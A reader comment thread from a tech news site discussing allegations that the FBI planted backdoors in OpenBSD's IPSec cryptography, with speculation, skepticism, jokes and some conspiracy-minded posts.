back to article FBI 'planted backdoor' in OpenBSD

Allegations that the FBI may have smuggled back doors or weaknesses into openBSD's cryptography have created uproar in the security community. Former government contractor Gregory Perry, who helped develop the OpenBSD crypto framework a decade ago, claims that contractors were paid to insert backdoors into OpenBSD's IPSec …


This topic is closed for new posts.
  1. jake Silver badge

    My old mentor ken made a point years ago ...

    I'm not paranoid, but the fact is that if you can't follow the tool-chain at a ones & zeros level, you really have no idea if your OS is secure or not.

    Don't like this concept? Stop using computers.

    1. This post has been deleted by its author

    2. Alpha Tony
      Gates Halo


      "if you can't follow the tool-chain at a ones & zeros level, you really have no idea if your OS is secure or not."

      Not true. I use Microsoft products so I am absolutely certain that my OS isn't secure.

  2. Richard Tobin


    Does the FBI really use 10-year NDAs for this purpose?

  3. Anonymous Coward
    Big Brother


    the NSA has direct input into the Linux kernel and graciously "donated" the code for SELinux (and what else?). Some kernel vulnerabilities persisted for years.

    MS has had an office at the NSA for years. Apple is also a cooperator. Google received "assistance" with their IPO from Tenet at CIA through one of the Firm's investment corps.

    OPEN is good - if one takes the time to read the code (or can read it).

    The NSA and other US entities (and certainly another "government" have buried half-keys in encryption products - commercial - and those in the know made millions from the suckers who were ignorant enough to purchase American software.

    Much of the world now understands that the US is a vassal state - and not independent. ALL of its agencies exist to dupe the rest of the world. It is not necessary to dupe the Americans, as they are the most ignorant folk on the face of the earth. They believe that a dude with a box cutter can "capture" several hundred people. Thus, they let the airport STASI fondle their now-public formerly-private parts.

    1. O RLY


      Wow after nine years, this is the first Truther I've seen who didn't refer to an "inside job". Perhaps that's a sign of developing sentience and independent thought. Probably not though.

      1. ITS Retired
        Big Brother

        Well, it's so obvious by now that it was, that 'inside job' didn't need to be mentioned.

        The post is required, and must contain letters.

        1. O RLY

          I think you meant the coat icon?

          Oh you were serious? Right.

          I love the Truthers. The US government is so amazingly smart that it can bomb three of the largest office buildings in the world, kill 3000 or so people, and cover it up so that Halliburton/Freemasons/Exxon/Bushes can get oil/more power/oil/war with Iraq/badgers. And that coverup is ironclad with no leaks, while simultaneously being incapable of preventing a low-ranking soldier access and release some quarter-million classified files documenting actual incidents of the US government's military killing civilians, State Dept docs, etc to an Swedish website run by an Aussie.

          What's that? Oh, I get it. Their incompetence is only a cover for their deft coverup of 9/11.

    2. 68 SK LFG

      The Kettle is Black

      Generalizing Americans as 'the most ignorant folk on the face of the earth' is in what way more intelligent than what (I admit) most Americans think of the rest of the world?

      I don't agree with quite a bit of what the government does in my and my country's name but unless there is a major civil upheaval, only incremental change will occur. I vote in every election for the best person for the job, party doesn't matter, and usually it's an exercise in choosing the lesser evil.


      And by the way - Obama and his people charmed a bunch of you folks out of your pants too - same old, same old. No true surprise at all.

      Your post was good until the last part and as Dick Cheney, the Walmart Greeter said, "Go Fuck Yourself"


    3. unitron

      Re: Google IPO

      Yeah, like Google really needed any help with their IPO.

      Their initial round of venture capital funding, maybe.

      By the way, if the dude with the boxcutter has hold of a stewardess and is threatening to gouge her eyes out with it if the passengers don't co-operate, passengers who have no reason to believe it's anything more than the usual kind of hijacking, they're probably going to opt not to cause her unneccessary blindness.

      1. Tom 13

        Yep. Of course that was pre 9-11.

        Now there's not much chance the passengers are going to believe the dude even if he was only your garden variety hijacking

  4. Paul Crawford Silver badge

    Interesting article, but where is the beef?

    No doubt we will see a lot of frothing in the commentary section over this since, if true, it is a serious compromise of software used by a number of security-focused companies and individuals.

    But it also reads a bit like some cheap novel, as it seems unlikely something as fundamentally important (to the FBI, etc) would be open for discussion following a "10 year NDA".

    So the real question, where is the cryptographic beef? Has anyone got evidence this succeeded?

    I guess it is possible that some subtle flaws in key components might have been smuggled in, but again I also expect this mechanism has been studied by people knowing FAR more than I do about the matter. So where is the evidence?

    Either way, I still trust open source far more than Windows!

  5. Sir Runcible Spoon


    Aren't Nokia Checkpoints (made by an Israeli firm for those who don't know) running on a version of FreeBSD?

    1. Anonymous Coward


      Yes, kind of. The o/s is called IPSO, and it's derived from FreeBSD.

      The article is about OpenBSD.

    2. Anonymous Coward
      Anonymous Coward


      IPSO, the o/s you're talking about was developed by Nokia, before the Checkpoint acquisition. Nokia were not an israeli company.

  6. yeehaw....
    Black Helicopters


    Hillary Clinton comes by it naturally - biometrics etc on international (as opposed to domestic) dips.

    Just figures.

    ...65 Druid LFG


  7. Anonymous Coward

    Google OpenBSD

    and you get...

    OpenBSDMultiplatform Ultra-Secure Operating System. Focus: portability, standardization , correctness, security, and cryptography.

    Or maybe not.

  8. Anonymous Coward
    Anonymous Coward

    Chris Wysopal opened his mouth and made himself look stupid

    .. thanks Chris for pointing out the bleeding obvious and taking away a headline from the daily mail.

  9. Inachu

    Now we cna know where the lag comes from.

    So if you make a negative comment about the feds or the president or ex president or show any sign of ANTI NEW WORLD ORDER anti NAFTA then suspect your home data lines bugged own so you can't play world of warcraft.

  10. corestore

    I'm skeptical

    1. With many eyes, how could the backdoor have escaped discovery?

    2. The consequences of discovery would be severe for all concerned; not worth the risk.

    Show me the code, or I'm not buying this.

    1. RegGuy

      Just read it...

    2. Anonymous Coward
      Black Helicopters

      I'm willing to buy that it is possible to slip in the back door.

      Not likely, and when I say possible I talking four or five standard deviations out on the normal curve possible.

      What doesn't scan for me is that one of the guys on the inside who pulled off the nearly impossible spills the beans 10 years later because ....? He's feeling guilty? The kinds of people who would plant a back door in open source code don't feel regret over that sort of thing. What's his angle? Is it disinformation instead?

  11. This post has been deleted by its author

  12. Anonymous Coward
    Big Brother

    But why...

    But why would the Feds want to plant a backdoor in an open source implementation, and run the risk of being discovered? And I'm not buying this "NDA expired" business - surely they would've thought about what would happen when it expires?

  13. Tony Green

    This would probably let them into other distros/OSes

    'Chris Wysopal, CTO of application security tools firm Veracode and former high profile member of hacker collective L0pht Heavy Industries, said that the issue of potential backdoors doesn't stop with OpenBSD: "If OpenBSD w/all their auditing was backdoored where does that leave Linux, Windows, FreeBSD, OS X. Who thinks they stopd at smallest dist?"'

    Since OpenSSH is intimately tied-in with OpenBSD, my guess would be that this is the cryptographical code they'll have hit. So no need to specifically target the rest of us, since most of us will be using OpenSSH anyway.

    Another good reason not to trust the bloody Yanks.

    1. Anonymous Coward


      The article is about a suggested backdoor in the IpSec stack in OpenBSD.

      SSH does not use IpSec.

      There is no connection between the article, and what you've posted.

  14. foo_bar_baz

    "Where does that leave ... Windows"?

    So. Many. Answers...

    1) The FBI doesn't need to bother with planting back doors, so many accidental ones already.

    2) The FBI backdoors have been disabled and replaced by Chinese subcontractors.

    3) No need for doors ... the Windows are already open.

    4) This is just open source FUD, closed and proprietary software is secure! We know because we paid for it.

    5) No need for backdoors in Windows - we have Adobe for that.

    6) Not worthwhile backdooring Windows - no worthwhile target would use Windows for VPNs or other Internet-facing services

    etc. etc.

    1. Maverick

      @ foo_bar_baz

      > So.Many. Answer?

      not really, just one

      > etc.. etc..

      you mean "etc." I think - there fixed that for you, unfortunately the rest of your post I ignored due to general ignorance :)

      1. foo_bar_baz

        I guess that was a poor attempt at humour

        I'll get my coat.

        I wasn't aware there was a fatwa on redundant et ceteras. Got it, duly noted, live and learn ... and so on and so forth. :P

        1. Tom 13

          No, you just managed

          to provoke a twit who probably had his sense of humor removed when he worked for the FBI in the dirty tricks division.

          I laughed and I use Windows every day.

  15. Peter Fairbrother 1

    Not sure I believe this, but..

    Greg's email claims: "the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA".

    OCF = OpenBSD crypto framework

    VPN = virtual private network, used to encrypt links between friendly sites

    EOUSA = Executive Office of the United States Attorneys. Not, as Greg describes, the "parent body of the FBI", it actually liases between the US Attorneys and the DoJ. However one of the functions of the 90-odd US Attorneys is to prosecute cases for the FBI..

    If true I don't think EOUSA will be very pleased that the FBI have been spying on them, or even attempting to - and they have the clout to do something about it.

  16. hoboroadie

    Lies, all lies!

    First Wikileaks, and now this. They hate our freedom.

  17. Anonymous Coward
    Anonymous Coward

    I'll say it...

    No one else has said this yet sooo...... AAAAAAAAAHHHHHHHHH!!! Feds in mah linux crypto stack?!?!?!? This is bad, very bad - if true. Hopefully evidence one way or the other will appear soon (wikileaks: how bout leaking some FBI backdoor docs)

  18. Destroy All Monsters Silver badge
    Big Brother

    By the .... FBI??? I laugh.

    More like one of the more shadowy intelligence agencies instead of the carreerist bumbling entrapment rightwinger circus freak show that the FBI is.

    These guys can't even get their office computers in order, for frack's sake!

  19. Kevin McMurtrie Silver badge

    "Who thinks they stopd at smallest dist?"

    Too much time in front of the terminal window, Chris.

    killall -ABRT stopd

  20. Is it me?

    A New open Source Paradigm

    Minister : How can we subvert open source software?

    Sir Humphrey : Well minister we have a bunch of very bright programmers in eh-hem, who can write some complex software with back doors we can exploit.

    Minister : But won't the community catch on?

    Sir Humphrey : No Minister, they trust their community, we just have to make sure any peer review is done by one of ours.

    Minister : Bring it on.

    Sorry, but some government department somewhere will have worked this one out.

    1. Graham Dawson Silver badge

      That's not Sir Humpers!

      He'd never suggest anything so aggressive and irresponsible! Why he'd simply suggest that the government could engage more closely with the open source community to reach a broad understanding of the necessitities of interaction between government agencies, the software community and individuals in order to provide a more open and direct means of intersecting the security needs of the state with the desire for individual autonomy within the confines of a multilateral framework that sets out the necessary responsibilities of all parties involved. Then the Minister would goggle and say "And that would provide us with-" and shake his hand, with the hope that this would portray that he has any idea at all what was just said, and Humpers would shake his head and say why no no no, minister, we are not proposing any such thing at all, we are merely attempting to facilitate more reliable interaction between ourselves and the general public! If it happens that a few innocent communications are temporarily misallocated before being sent to their correct destination we will of course be incredibly eager to see to it that any future miscommunication vis a vis the necessary destinations of public communications are of course communicated correctly, and we will in the fullness of time time considering all possibilities with due concern correctly communicate this correct communication to the correct communities.

      He'd never suggest for one moment that they spy on people. Certainly not.

  21. Anonymous Coward

    From The Perspective Of A Different Country

    ..I would say this sounds entirely plausible. I worked for a non-US crypto company at that time and USGov was quite concerned about this company doing a proper version of SSL (128 bit symmetric key).

    My employer did not make this SSL library publicly available, but sold it for special-purpose finance applications.

    Despite the fact that we had 128 bit end-to-end, real security was quite often a theater. For example, we needed Safe Session Identifiers to protect user sessions over more than one HTTPS request. Some extremely smart people ended up using rand(5) to generate that Session Identifier. I alerted management to this, who were basically annoyed at the prospect of spending money on fixing the problem. The fix was only ever rolled out for new projects; existing ones had the "capturable" sessions for years, despite of our clear knowledge.

    Malice, Laziness, Incompetence ? You decide.

    PS: The company went belly up after they went on a 1000 million $ acquisition spree.

  22. Tron Silver badge

    Hardly a surprise.

    Do you really think the creators of Stuxnet stumbled over those four zero-day vulnerabilities in Windows?

  23. Daniel B.

    Theo de Raadt in facepalm

    Maybe he'll stop dissing Linux as a "cheap hackjob" now that his BSD distro has been outed as "0wned by the FBI".

    Of course, I wonder if other OSen have similar things? Isn't it supposed that the open source process would catch these kind of things?

    Hey wait, someone tried to sabotage the Linux kernel a couple of years ago. It was found in the version control before it was released to the public... so probably OpenBSD's process isn't as good as they claim it to be.

  24. Anonymous Coward

    Other Plausible Explanation: FUD By $$Vendor$$

    I do think some commercialware software vendors (mainly from the west of the U.S. of A) are really scared by Linux and BSD eating their future revenue in a very comprehensive way.

    This could be the reason "for a guy forthcoming after the expiry of his NDA". He actually got a big fat contract by commercialware front-company WindScreen Computing Inc, which in turn got an even bigger contract from ... well you know whom I mean. Those behind the SCO/Unix/linux theater. He plays the FUD mouthpiece.

    We are going to see whether this is just part of a FUD exercise and it will certainly make BSD stronger, because of all the eyeballs looking at the code AGAIN. And if WindScreen Inc can dig up some real bugs, all the better. It will only harden open source software.

    The Chinese government will construct one more zero-day exploit based on their ability to inspect Windows Source. Looking forward for The Day 400 million Windows Users Are Owned.

  25. Tigra 07

    But is it twoo?

    Surely a backdoor planted in Windows would have been noticed by now?

    Or was it so badly made that it never worked?

    I'm not a hater, i love Windows 7 =]

    I just acknowledge they have a bad record in the security area, whether their fault or someone elses.

    1. Keith T

      Would Windows being insecure make it okay for OpenBSD to be insecure?

      Windows isn't the issue here, but is your point that Windows being insecure would make it okay for OpenBSD to be insecure?

  26. vincent himpe

    makes you wonder

    how many of the 'open source' adepts actually read , and more importantly, understand the source....

    i'll get me coat, it's the one with the scissors to cut my ethernet cable ...

    1. Keith T

      same percent as read the EULA of shrink wrapped software

      Just one example

      Linux kernel purged of five-year-old root access bug

      Worse than that, the bug was known during much of that time.

  27. Andrew Norton

    funny story (and true)

    Second comment on the 'STallman mauls ChromeOS' story is about how the three letter agencies have access to windows, but linux and *BSD are safe.


    MOst people don't pay attention to the code, especially in large thigns like OS'. People just assume someone else has checked, and when backdoors, exploits etc. come out, there's no accountability.

    Mozilla is a great example of this. Firefox for windows has one of the WORST security records of any browser. It's still advertised as being secure, because the little bit THEY write, is. All the exploits are in the majority of the code others write. Instead of spending some of the $50M/year on making their product secure, they spend it on advertising, convicing the poor saps that it is. MS does the same sort of thing (but not as bad) and gets crucified, because they are accountable, with it all being coded in-house.

  28. Robert E A Harvey
    Big Brother

    or windows?

    >Who thinks they stopd at smallest dist?"

    or indeed at non-commercial software?

    Only one suitable icon

    1. Keith T

      Who didn't

      Did/does anyone not think there are backdoors in commercial closed source code?

      I thought that had always been a given, but that it was claimed that they "many eyes" would keep such things out of open source.

      These would be the same "many eyes" that read over each edition of the Oxford English Dictionary looking for errors.

  29. Rainer
    Black Helicopters

    Small yes

    ...but influential nevertheless.

    In the security-world, trends tend to hit OpenBSD 6 months before the rest of the world.

  30. JaitcH

    Experiment yes. Success No: E J Hilbert, a former FBI cyber-crime agent

    How do we know Hilbert isn't just spreading bullshit?

    This is the problem.

    1. Keith T

      we could tell be reading archived code

      We could tell be reading archived source code.

      If anyone bothers to do this, I expect we'll have a preliminary answer by next week.

      1. jake Silver badge

        @Keith T

        "We could tell be reading archived source code."

        This won't do you any good, at least if you don't have control of the tool chain ... My assembler & linker can easily leave me a backdoor in the resulting binaries, *EVEN IF* that backdoor isn't in the source code that you feed 'em. Think about it.

        "If anyone bothers to do this, I expect we'll have a preliminary answer by next week."

        Again, I invite all y'all to read: ... The source code is one thing, but the corner-stone binaries are another. Don't confuse the two.

  31. Anonymous Coward


    Eh, so after ten years on a security conscious open-source system this hasn't been detected ? To mis-appropriate Mr.Dawkin's scale, I'm scoring a 6.99999 on the Fud/Dung detector here.

  32. ForthIsNotDead
    Black Helicopters


    Makes you wonder if perhaps there *is* something to the Inslaw PROMIS scandal...

  33. Zolko Silver badge

    happened in Linux

    AND there is beef to support it:

    Aha, so it was the FBI who did that. Trying to smuggle a root access back-door into the Linux kernel. Interesting.

    1. Chemist

      "happened in Linux"

      After following the link it looks as though this 'attempt' was spotted quickly and wouldn't have made it to the compiled code stage anyway.

  34. Neal 5

    Here's the email

    Does anyone really expect anything other than denials all round. Common knowledge that the NSA has backdoors into near enough every American system, quite openly in some cases, quick Google for "NSA backdoors Windows" is quite detailed and there's no reason to think it any different on any other OS.

    Like machiavelli wroted in le principe.

    "The state is allowed to do everything in favor for the state itself."

    Which is why if you or I backdoored the Worlds OS's we'd be looking at plenty of HM's pleasure, and some numpty f+++wit from the establishment gets a peerage and full indexed linked early retirement pension for the same crime.

    1. Anonymous Coward
      Anonymous Coward

      My Question is, "How many countries have back doors in it?"

      My Question has always been, "How many countries have back doors in it?"

      With commercial software I assume the nation where the functional headquarters are, plus the USA, plus several other nations with a really big security budget and lots of expat citizens well-placed working in the IT industry worldwide.

      With open source, the barriers to entry are lower.

      And if the back door is discovered, it is easier to claim it is a vulnerability included by mistake or to hide the author. (Easer with open source, I suspect. Also possible with closed source. I don't doubt that at least some vulnerabilities were intentionally installed.)

      1. Chemist

        "With open source, the barriers to entry are lower."

        Nonsense !

  35. Anonymous Coward
    Anonymous Coward

    Perry's involvement?

    It isn't quite clear in the article, but was Perry actually involved in the backdoor work he is claiming occurred? If so then he is a git. If you sign up to an NDA or are otherwise bound to secrecy, then OK, you keep quiet about what you know. But to actually do the work is another thing entirely : that shows no sense of ethics at all.

  36. kain preacher

    Um a few things

    SInce when do NDAs for the FBI expire . Better yet why would the FBI need a NDA. They do have the ability to classify things as top secret .

  37. Graham Wilson

    Yawn, why am I not surprised?

    Yawn, why am I not surprised?

    Tomorrow, expect it to be Windows and/or Linux.

    The only surprise is who'll get there first, security insiders or WikiLeaks.

  38. Magnus_Pym

    If this proves to be true

    Yes of course, like no-one looked closely at BSD cryptography over the years. It was never peer reviewed, No university courses used it as a teaching model and no researchers are interested in crypo at all. Not really credible.

    I heard that the US and USSR tried to control each others nuclear weapons with the power of 'Psychic's' trained minds. If this proves true it could radically alter the war on terror.

    Problem is it isn't true. Yes they tried and yes they failed. Yes they gave up. Isn't this the same type of story.

  39. Gerhard den Hollander


    Which is why I encrypt all my secure communications using solitaire.

    It takes a bit longer to encode, but at least it whiles away the evenings.

    Encrypting jpeg's is a bitch though

  40. sabba

    No offence guys...

    ...but I'd have been more surprised if they hadn't inserted these backdoors!!

  41. This post has been deleted by its author

  42. mhenriday
    Big Brother

    «... and their appearance and their work

    was as it were a wheel in the middle of a wheel ...»

    And I who thought that this sort of thing only occured in «other» countries, with «totalitarian» systems ! But perhaps it's all for the best and these erosions of our civil liberties are done solely to protect us from all the lurking dangers out there....


  43. Anonymous Coward

    You Can See It Clearly: Windows Is Better

    Because with Windows only a the proper authorities can discover backdoors easily. Including the authorities located in

    Beijing, Brasilia, Berlin, London, Madrid, Moscow, Washington, Paris, Rome.

    Windows users will be primarily fscked by the governments, those who can use the intelligence gathered to make a legal circus show (cue: The Assange Law Show ). With you, dear user fermenting in a government jail.

    The Chinese government has already used this capability to the Full Extent, according to the news reports. They only don't bother to call it "rape". They call it "enemy of the state". Result is the same, but at least the authorities are HONEST.

    Now that the USOFA uses botnets to gather intelligence, I suspect the Russkie Govt is not just turning a "blind eye" to the Russian Business Network. My guess is that the RBN has the opportunity to Make Money while the Russkie Government can Produce Intelligence from the RBN botnets.

    Doubleclick recently distributed a Virus over their Ad Network. Should we call this "American Business Network" ?

  44. Michael Souris
    Black Helicopters

    Digital Fortress

    Hmm. Reminds me of the "plot" of Dan brown's Digital Fortress. That was badly written bollocks, too.

  45. Anonymous Coward

    From The Horses Mouth: Cable 09STATE67105

    One Google Query ("09STATE67105") away:

    "¶55. (S//NF) CTAD comment: Of note, the CNITSEC is responsible

    for overseeing the PRC's Information Technology (IT) security

    certification program. It operates and maintains the National

    Evaluation and Certification Scheme for IT security and

    performs tests for information security products. In 2003,

    the CNITSEC signed a Government Security Program (GSP)

    international agreement with Microsoft that allowed select

    companies such as TOPSEC access to Microsoft source code in

    order to secure the Windows platform. XXXXXXXXXXXX

    ¶56. (S//NF) CTAD comment: Additionally, CNITSEC enterprises

    has recruited Chinese hackers in support of nationally-funded

    "network attack scientific research projects." From June 2002

    to March 2003, TOPSEC employed a known Chinese hacker, Lin

    Yong (a.k.a. Lion and owner of the Honker Union of China), as

    senior security service engineer to manage security service

    and training. Venus Tech, another CNITSEC enterprise privy to

    the GSP, is also known to affiliate with XFocus, one of the

    few Chinese hacker groups known to develop exploits to new

    vulnerabilities in a short period of time, as evidenced in

    the 2003 release of Blaster Worm (See CTAD Daily Read File

    (DRF) April 4, 2008)."

  46. Dennis Wilson

    Here we go again.............

    I feel another swedish sex crime rendition coming on.

  47. Anonymous Coward
    Anonymous Coward

    Around this time were looking at openbsd for secure comm's

    It was around this time the newsgroup were looking at a secure communications platform for forums sothe cliche could avoid the chaff. Interestingly the project was running full steam and then suddenly went cold and silent with many involved dropping of the scene. Maybe they found something then and maybe not.

    Still bottom line NOTHING is secure and thats about as secure as it can ever get.

    Code audits are all well and fine by when you deal with crypto who audits the maths behind the encryption as a coder will only end up fixing broken code and not the maths. So all the code audits in the World wouldn't find the types of flaws that are being highlighted.

    Padding is and always will be a indication of a imperfect system.

    ANON as those that know, know

    PS whats a peace of handwritten paper from Theo on OpenBSD stationary stating of course its secure dated around this time worth I'm wondering }->

This topic is closed for new posts.